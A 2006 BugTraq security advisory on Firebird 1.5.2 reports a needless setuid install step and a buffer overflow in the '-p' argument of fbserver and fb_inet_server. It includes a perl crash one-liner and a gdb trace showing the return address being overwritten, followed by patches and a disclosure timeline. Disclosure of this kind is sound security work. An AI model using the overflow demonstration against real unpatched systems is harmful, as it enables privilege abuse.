BugTraq
Buffer Overflow and Installation Script Error in Firebird 1.5.3 Mar 12 2006 03:56PM
Joxean Koret (joxeankoret yahoo es)
Hi to all!

In the latest Firebird release (1.5.3) various security problems has
been fixed. Attached goes an advisory about 2 of these.

---
Joxean Koret

------------------------------------------------------------------------
---

Buffer Overflow and Installation Script Error in Firebird 1.5.3

------------------------------------------------------------------------
---

Author: Jose Antonio Coret (Joxean Koret)

Date: 2005-02-18

Location: Basque Country

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Product: Firebird

Vulnerable Version: 1.5.2.4731

Description:

Firebird is a relational database offering many ANSI SQL-99 features that runs

on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent

concurrency, high performance, and powerful language support for stored

procedures and triggers. It has been used in production systems, under a variety

of names since 1981.

Web : http://firebird.sourceforge.net

------------------------------------------------------------------------
---

Vulnerability List:

~~~~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:

~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily

- The installation script of Firebird 1.5.2 makes the binaries fb_inet_server

and fbserver suid firebird but this is unnecesary. If you takes a look to the

install script "firebird1.5.2.XXXX/scripts/postinstall.sh" you will see the

following lines:

(...)

# SUID is still needed for group direct access. General users

# cannot run though.

for i in fb_lock_mgr gds_drop fb_inet_server

do

if [ -f $i ]

then

chmod ug=rx,o= $i

chmod ug+s $i

fi

done

(...)

but, as the author says the fb_inet_server (at least) doesn't need to be suid firebird.

The following is a fragment of Alex Peshkov (a Firebird developer) response about

this problem:

They need not and should not be set*id. And in standard precompiled

binaries fbserver is not setuid. But for unknown to me reasons

fb_inet_server is made setuid 'firebird' by install script (Debian guys

fixed it, I think). I've noticed it, unfortunately, after release of

1.5.2, but definitely will fix it in future releases. Except security

vulnerability this brings additional problem when one wants to change

fb_inet_server run-user - changing only xinetd.d entry is not enough.

- Debian distributions are not vulnerable to this problem. As the Alex Peshkov says

Debian people has been fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

- The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable

to buffer overflows. If an string of more than 150 characters is passed to the

'-p' parameter of any of these binaries the program will crash with a

"Segmentation Fault" message.

- The following is a test of the vulnerability:

/usr/lib/firebird2/bin$ ls

fb_lock_print fbguard fbmgr fbmgr.bin fbserver gsec

/usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234

Segmentation fault

The program dies abruptly. The bytes passeds from position 155 to 159

overwrites the return address:

/usr/lib/firebird2/bin$ gdb ./fbserver

GNU gdb 6.3

(...)

(gdb) run -p `perl -e 'print "a"x155;'`4321

Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print

"a"x155;'`4321

(...)

Program received signal SIGSEGV, Segmentation fault.

[Switching to Thread -1210892160 (LWP 25358)]

0x31323334 in ?? ()

We have been overwrite the return address with the bytes 0x31 0x32 0x33 0x34,

the numbers 4 3 2 1 in reverse order.

(gdb) where

#0 0x31323334 in ?? ()

#1 0x08233496 in ?? ()

#2 0x00000000 in ?? ()

#3 0xbffff9b0 in ?? ()

#4 0x00006161 in ?? ()

#5 0x00000000 in ?? ()

#6 0x00000000 in ?? ()

#7 0x00000000 in ?? ()

#8 0x00000000 in ?? ()

#9 0x00000000 in ?? ()

#10 0xbffff9b0 in ?? ()

#11 0x00000000 in ?? ()

#12 0x00000000 in ?? ()

#13 0x00000000 in ?? ()

#14 0xbffffb04 in ?? ()

#15 0x0804e370 in ?? ()

#16 0x00000000 in ?? ()

#17 0xbffffd50 in ?? ()

#18 0x00000000 in ?? ()

#19 0x00000000 in ?? ()

#20 0x00000000 in ?? ()

#21 0x00000000 in ?? ()

#22 0x00000000 in ?? ()

Notes:

~~~~~~

- Various other problems, not discovered by me, has been fixed in the 1.5.3

version. I encourage to upgrade to the newest version as soon as possible.

Patches for the 1.5.2 version:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- The following are patches to solve ONLY the problems that I have been found.

Patch for installation script:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------

--- scripts/postinstall.sh 2005-03-25 14:24:40.091819144 +0100

+++ scripts/postinstall.sh.corrected 2005-03-25 14:08:47.777592912 +0100

@@ -401,7 +401,7 @@

# SUID is still needed for group direct access. General users

# cannot run though.

- for i in fb_lock_mgr gds_drop fb_inet_server

+ for i in fb_lock_mgr gds_drop

do

if [ -f $i ]

then

@@ -508,7 +508,7 @@

# SUID is still needed for group direct access. General users

# cannot run though.

- for i in fb_lock_mgr gds_drop fb_inet_server

+ for i in fb_lock_mgr gds_drop

do

if [ -f $i ]

then

---------------------END OF THE PATCH------------------------------

Patch for fb_inet_server and/or fbserver buffer overflow:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--------------------START OF THE PATCH----------------------------

--- src/remote/inet_server.cpp 2004-09-29 12:03:39.000000000 +0200

+++ src/remote/inet_server.cpp.corrected 2005-03-25 14:17:59.698688152 +0100

@@ -32,7 +32,7 @@

*

*/

/*

-$Id: inet_server.cpp,v 1.26.2.2 2004/09/29 10:03:39 paul_reeves Exp $

+$Id: inet_server.cpp,v 1.26.2.3 2005/03/23 12:59:25 alexpeshkoff Exp $

*/

#include "firebird.h"

#include "../jrd/ib_stdio.h"

@@ -277,7 +277,10 @@

break;

case 'P':

- sprintf(protocol, "/%s", *argv++);

+ protocol[0] = '/';

+ protocol[1] = 0;

+ strncat(protocol, *argv++,

+ sizeof(protocol) - strlen(protocol) - 1);

break;

case 'H':

@@ -407,12 +410,9 @@

/* before starting the superserver stuff change directory to tmp */

if (CHANGE_DIR(TEMP_DIR)) {

- char err_buf[1024];

-

/* error on changing the directory */

- sprintf(err_buf, "Could not change directory to %s due to errno %d",

+ gds__log("Could not change directory to %s due to errno %d",

TEMP_DIR, errno);

- gds__log(err_buf);

}

/* Server tries to attash to security.fdb to make sure everything is OK

---------------------END OF THE PATCH------------------------------

The fix:

~~~~~~~~

The problems are fixed, in the current 1.5.3 version of the Firebird binary

distribution.

Thanks

~~~~~~

Thanks to Alex Peshkov, he where very kind and professional.

Timeline:

~~~~~~~~~

2005-02-18: Initial contact.

2005-02-11: Contact with Alex Peshkov.

2005-03-25: BOF (and various others) fixed in CVS.

2005-03-25: Wait for ~2 months after the 1.5.3 release.

2006-01-25: Firebird 1.5.3 released.

2006-03-12: Public disclosure.

Disclaimer:

~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided

"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of

using the information or demonstrations provided in any part of this

advisory.

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQBEFESXU6rFMEYDrlERAnZSAJsGRkt+NgzbtThNsTZeRjk65kccWwCfQ6wd
nCuCfMINja0ayNIRAuXoUdU=
=5ERM
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus